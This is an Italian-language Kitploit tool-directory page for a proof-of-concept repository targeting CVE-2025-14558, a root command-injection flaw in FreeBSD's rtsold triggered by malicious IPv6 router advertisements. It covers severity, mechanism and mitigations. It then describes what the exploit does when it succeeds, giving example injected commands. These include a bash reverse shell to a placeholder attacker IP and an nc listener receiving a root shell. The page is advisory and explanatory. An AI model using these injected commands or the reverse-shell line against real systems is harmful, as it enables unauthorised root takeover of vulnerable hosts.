Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/rockmelodies/blackash-cve-2025-14558
Generazione di PayloadAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingCommand and Control
GitHubrockmelodies/blackash-cve-2025-14558

Blackash-CVE-2025-14558

CVE-2025-14558

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-14558 : Esecuzione Remota di Codice Critica in FreeBSD (IPv6)

G8195ymXcAAjXC2

🧠 Panoramica

CVE-2025-14558 è una vulnerabilità critica di esecuzione remota di codice (RCE) che colpisce i sistemi FreeBSD che utilizzano i servizi di sollecitazione dei router IPv6. Un difetto nella gestione degli input di rete non attendibili consente agli attaccanti di eseguire comandi shell arbitrari.


📊 Gravità

  • Punteggio CVSS v3: 9.8 / 10 🔥
  • Livello di Rischio: Critico
  • Privilegi Richiesti: Nessuno
  • Interazione dell'Utente: Nessuna

🎯 Componenti Interessati

  • rtsol(8)
  • rtsold(8)
  • Sistemi FreeBSD che utilizzano IPv6 Stateless Address Autoconfiguration (SLAAC)

⚙️ Dettagli Tecnici

  • Pacchetti IPv6 Router Advertisement (RA) dannosi possono includere un'opzione Domain Search List appositamente costruita
  • L'input viene passato in modo non sicuro a resolvconf(8)
  • Un quoting shell improprio consente l'iniezione di comandi
  • Porta all'esecuzione arbitraria di comandi come root

🕸️ Vettore di Attacco

  • 🌐 Basato sulla rete
  • 📍 L'attaccante deve trovarsi sullo stesso segmento di rete locale
  • Nessuna autenticazione o credenziali richieste

💥 Impatto

Se sfruttata con successo, un attaccante può:

  • Ottenere la compromissione totale del sistema
  • Eseguire comandi arbitrari
  • Modificare la configurazione del sistema
  • Stabilire persistenza o movimento laterale

🧪 Disponibilità dell'Exploit

  • ✅ Esiste una Proof-of-Concept (PoC) pubblica
  • Dimostra l'esecuzione di comandi tramite pacchetti RA IPv6 appositamente costruiti

🛡️ Mitigazione e Difesa

Azioni fortemente raccomandate:

  • 🔧 Applicare le patch di sicurezza ufficiali di FreeBSD
  • 🚫 Disabilitare rtsol / rtsold se gli RA IPv6 non sono necessari
  • 🔒 Filtrare o bloccare i Router Advertisement IPv6 non attendibili
  • 🧱 Utilizzare la segmentazione di rete per limitare l'esposizione agli attaccanti locali

📝 Concetto Chiave

Qualsiasi sistema FreeBSD in ascolto di router advertisement IPv6 su una rete non attendibile è ad alto rischio. Applicare le patch immediatamente o disabilitare i servizi interessati.


Se lo script PoC per CVE-2025-14558 funziona correttamente su un sistema FreeBSD vulnerabile (non patchato, con rtsold in esecuzione e che processa i messaggi RA IPv6):

Sul Target (Macchina FreeBSD Vulnerabile):

  • Il comando iniettato viene eseguito immediatamente come root (poiché rtsold viene eseguito come root e chiama /sbin/resolvconf con il dominio malevolo).
  • Nessun output visibile appare nella console o nei log per impostazione predefinita (il comando viene eseguito silenziosamente in background).
  • Esempi di cosa succede:
    • Per un test semplice come --command "id > /tmp/pwned":

      • Viene creato un file /tmp/pwned contenente un output simile a:

        root@kitploit:~
        uid=0(root) gid=0(wheel) groups=0(wheel)
        
    • Per --command "touch /tmp/exploit_success":

      • Appare un file vuoto /tmp/exploit_success.
    • Per una reverse shell come --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":

      • Nessun cambiamento visibile immediato sul target, ma viene tentata una connessione verso il tuo listener.

Controlla sul target con comandi come:

root@kitploit:~
ls -l /tmp/pwned
cat /tmp/pwned

Sul Lato Attaccante (Esecuzione dello Script):

  • Lo script restituisce il seguente output:

    root@kitploit:~
    [+] Sending malicious RA on eth0
    [+] Injected command: id > /tmp/pwned
    [+] Target must run vulnerable rtsold and process the RA
    [+] Done. Check target for execution (e.g. /tmp/pwned)
    
    
  • Per la reverse shell: se ha successo, il tuo nc -lvnp 4444 riceve una connessione e una shell di root:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
    bash: cannot set terminal process groups: No job control in this shell
    bash: no job control in this shell
    root@vulnerable-host:~ #
    

    (Ora hai una shell di root – digita comandi come id, whoami, ecc.)

Se Non Funziona:

  • Nessun file creato/nessuna connessione → motivi: target patchato, rtsold non in esecuzione, non sulla stessa rete L2, firewall che blocca gli RA, o IPv6 disabilitato.

Questo è osservabile solo in un laboratorio controllato su un sistema FreeBSD vulnerabile (pre-patch del 16 dicembre 2025). Nessun report pubblico di sfruttamento nel mondo reale al 23 dicembre 2025. Applicare le patch immediatamente in produzione.


⚠️ Disclaimer: Queste informazioni sono fornite solo a scopo informativo e non costituiscono consulenza di sicurezza, legale o operativa. Rivedere e seguire sempre gli advisory, le patch e le linee guida ufficiali del fornitore prima di intraprendere azioni di remediation.

Scarica lo strumento